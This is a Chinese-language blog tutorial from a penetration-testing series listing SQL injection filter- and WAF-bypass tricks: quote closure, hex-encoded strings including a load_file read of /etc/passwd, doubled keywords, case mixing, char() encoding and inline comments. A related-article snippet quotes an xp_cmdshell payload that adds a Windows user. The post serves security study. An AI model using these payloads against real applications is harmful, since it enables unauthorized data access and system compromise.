sql注入(8), 常见注入绕过技巧

最新推荐文章于 2024-07-16 17:43:15 发布
最新推荐文章于 2024-07-16 17:43:15 发布
阅读量449 收藏 1
点赞数 1
分类专栏: 渗透测试-web漏洞 文章标签: sql 数据库 mysql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bua200720411091/article/details/133855131
版权

注入绕过技巧

一, 闭合与逻辑

作用:

  1. 绕过后端对 or 或 and 的禁用
  2. 绕过后端对空格的禁用

例如:
用 ||, && 代替 or, and
用括号代替空格

payload: 1’ or ‘1’='1
闭合: id=‘1’ or ‘1’=‘1’

payload: 1’ || ‘1’='1
闭合: id=‘1’ || ‘1’=‘1’

where id<10&&content like ‘%作者%’
select(username)from(user)

二, 十六进制字符串绕过引号转义

作用:
绕过后端对字符串中单引号的屏蔽.

例如:
select hex(‘/etc/passwd’) # 输出: 2F6574632F706173737764
select load_file(0x2F6574632F706173737764)

select hex(‘learn’) # 输出: 6C6561726E
select groupconcat(table_name) from information.tables where table_schema=0x6C6561726E

三, WAF 绕过

1. 双写绕过

作用:
绕过后端对 select, and, or 等关键字的过滤, 比如替换关键字为空.

例如:
selselectect 替换后: select
anandd 替换后: and

2. 大小写绕过

例如:
SelecT, AnD, Or

3. 编码绕过

Base64, ASCII, 16进制

例如:
select char(49)
结果: 1

select concat( char(45), char(50), char(65) )
结果: 12A

4. 特殊字符绕过

内连注释:
select username from /!user/
select username from /!user/ /!union/ select 77

DeltaTime
关注
专栏目录
mysql 16进制 绕过_注入绕过技巧
weixin_39846361的博客
01-20 3010
1.绕过空格(注释符/* */,%a0):两个空格代替一个空格,用Tab代替空格,%a0=空格:%20%09%0a %0b %0c %0d %a0/**/最基本的绕过方法,用注释替换空格:/*注释*/2.括号绕过空格:如果空格被过滤,括号没有被过滤,可以用括号绕过。在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。例如:...
SQL注入各种注入原理|绕过技巧|带实例详解|
没有
03-19 8285
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
SQL注入绕过引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
SQL注入 引号转义绕过
热门推荐
Auroraxsn的博客
04-25 1万+
问题描述 做了一个靶场,注入点为数字类型,一开始一帆风顺,直到爆破列名的时候突然报错,页面突然就没了,毫无征兆...报错时的url如下: ?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_name="users" 查看源码: $sql="SELECT * FROM users wher
ThinkPHP中单引号转义绕过方法
最新发布
taobao2024api的博客
07-16 773
绕过引号转义SQL 注入攻击中的一个常见技巧,要想防御此类攻击,需要注意在使用原生 SQL 时,一定要对特殊字符进行转义,同时需要注意使用转义的方式。因为 '\' 可以在 SQL 的语法中正常识别,所以使用 '\' 来进行转义是可行的。但是,需要注意的是,由于 '\' 本身在 PHP 中也是转义符,因此在 PHP 中需要使用双重转义符 '\\'' 来表示 '\'。因此使用双引号可以有效绕过引号转义,但是需要注意的是,使用双引号可能会遇到转义的问题,例如:双引号本身就需要使用 '\' 进行转义
SQL注入绕过
嚴 帅的博客
04-30 1025
由于Web注入危害比较大,各种防御技术也会应用而生;程序员在写代码的时候会有意识地进行防御设置或者安全测试来封堵Web注入,但是想要绝对的安全,是比较难实现的。针对黑名单过滤技术,绕过的基本思路就是找到一种可替换的符号或者可替换的逻辑语句(来实现SQL注入);对于白名单技术,虽然实现了安全性,但是可能会阻挡一些客户端的合法流量,白名单技术一般用在一些形式固定场景。大多数Web网站还是会使用黑名单技...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入是一种常见的网络攻击技术,攻击者通过构造特殊的SQL代码片段,利用Web应用程序与数据库之间的交互漏洞来获取、修改或者删除数据库中的信息。过滤逗号是安全领域常见的一种防御SQL注入的方法,因为SQL语句中...
SQL注入绕过技巧总结
09-09
SQL注入是一种常见的网络安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来操纵数据库查询。本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL防...
SQL注入---字符绕过
zhoutong2323的博客
04-10 1629
当网页源代码中出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过 上述代码中无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合演示案例: 二.and 和 or 过滤绕过 过滤源代码 绕过手法 三.空格过滤绕过 过滤代码: 绕过手法: 在不同的环境中能够绕过的URL编码有所不同,因此需要多次尝试。演示案例:未使用URL编码注入前:符号被过滤 使用URL注入编码后 报错注入
SQL注入de绕过
weixin_44029504的博客
04-17 391
SQL注入绕过 基本思路 基本思路找到一种可替换的符号或者可替换的逻辑语句。 --------------------------------------------------------分隔符--------------------------------------------------- 过滤关键字 1、and与or的过滤 1)替换 or---> || and--> &amp...
sql注入各种绕过
weixin_42478365的博客
08-01 8525
sql注入绕过
sql注入常见绕过方法
ljlrookiebird的博客
09-05 4662
sql注入是web安全的常见漏洞,这里总结下常见绕过姿势,还有其他没总结到了,小伙伴可以留言补充
【Web安全】SQL各类注入绕过
2401_84281638的博客
04-27 1190
其中concat()函数为连接函数,连接波浪号和查询信息,波浪号常常使用0x7e代替,substr为截取函数,因为报错信息最多32位,或者使用limit分页函数。
mysql 16进制 绕过_sql注入绕过
weixin_39783633的博客
02-01 892
1.空格过滤绕过可用/**/制表符(url编码为%09)换行符(%0a)括号反引号 代替空格mysql数据库有一个特性。在条件语句中,在 where id =1 后面加上 “=1”,成为where id =1 =1 ,就是对前面所有结果&1,查询的结果与原来一样。where id =1 =0 就是对于前面所有结果&0 ,查询的结果为除去原有查询结果的其他数据,输出的是除去1以外的...
limit 后注入_SQL注入中的WAF绕过技术
weixin_39932838的博客
11-26 210
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mysql注入中比如表名或是...
记一次艰难的SQL注入(过安全狗)
白帽子凯哥聊黑客
05-29 1458
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
SQL注入引号类型+空格过滤
Auroraxsn的博客
04-24 2011
初始页面: 1.判断注入类型 ?name=root' 页面返回异常,既没有表格内容也没有表格的列名 ?name=root" 页面返回正常,没有表格内容但有表格列名,判断为单引号类型 ?name=root'--+ 页面报错,显示“ERROR NO SPACE”,猜测可能有空格过滤 ?name=root'%23 ?name=root'/**/' ?name=root'and(1=1)%23 页面返回正常,即有表格内容又有表格列名,判断为空格过滤 ...
SQL注入绕过WAF策略与技巧解析
SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过输入恶意SQL语句,意图获取、修改或删除数据库中的数据。当网站部署了Web应用防火墙(WAF)来防止这种攻击时,攻击者会寻找各种技巧绕过WAF的防护措施,从而...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值